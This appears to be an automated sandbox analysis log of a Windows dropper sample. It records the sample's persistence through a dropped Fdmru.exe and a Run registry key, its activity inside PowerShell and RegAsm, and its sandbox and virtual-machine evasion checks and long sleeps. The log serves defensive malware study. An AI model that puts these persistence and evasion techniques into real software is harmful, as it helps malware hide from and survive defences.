                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Code function: 0_2_0120F1B8 push C4012127h; iretd
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Code function: 0_2_0120A7A5 pushfd ; retf
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Code function: 0_2_0120A78D pushfd ; retf
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Code function: 0_2_01209620 push D40902EBh; retf
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Static PE information: 0xC1D21F41 [Mon Jan 16 06:20:49 2073 UTC]
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | File created: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Fdmru
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.581149439.0000000007E04000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.569512318.0000000007C11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe TID: 4280 Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe TID: 5804 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1340 Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1536 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176 Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176 Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3800 Thread sleep count: 4825 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176 Thread sleep time: -99840s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176 Thread sleep time: -99718s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176 Thread sleep time: -99606s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176 Thread sleep time: -99494s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176 Thread sleep time: -99374s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176 Thread sleep time: -99250s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176 Thread sleep time: -99105s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176 Thread sleep time: -98982s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176 Thread sleep time: -98874s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176 Thread sleep time: -98760s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176 Thread sleep time: -98638s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176 Thread sleep time: -99917s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176 Thread sleep time: -99808s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176 Thread sleep time: -99696s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176 Thread sleep time: -99935s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176 Thread sleep time: -99821s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176 Thread sleep time: -99699s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1176 Thread sleep time: -99527s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2328 Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe TID: 2576 Thread sleep count: 657 > 30
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Window / User API: threadDelayed 566
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7973
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 4825
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe Window / User API: threadDelayed 649
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe Window / User API: threadDelayed 657
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 99840
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 99718
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 99606
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 99494
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 99374
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 99250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 99105
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 98982
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 98874
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 98760
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 98638
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 99917
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 99808
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 99696
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 99935
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 99821
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 99699
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 99527
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.502074939.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.569512318.0000000007C11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.569512318.0000000007C11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
                    Source: RegAsm.exe, 00000010.00000003.603873125.00000000053E4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Process created: Base64 decoded Start-Sleep -Seconds 56
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Process created: Base64 decoded Start-Sleep -Seconds 56
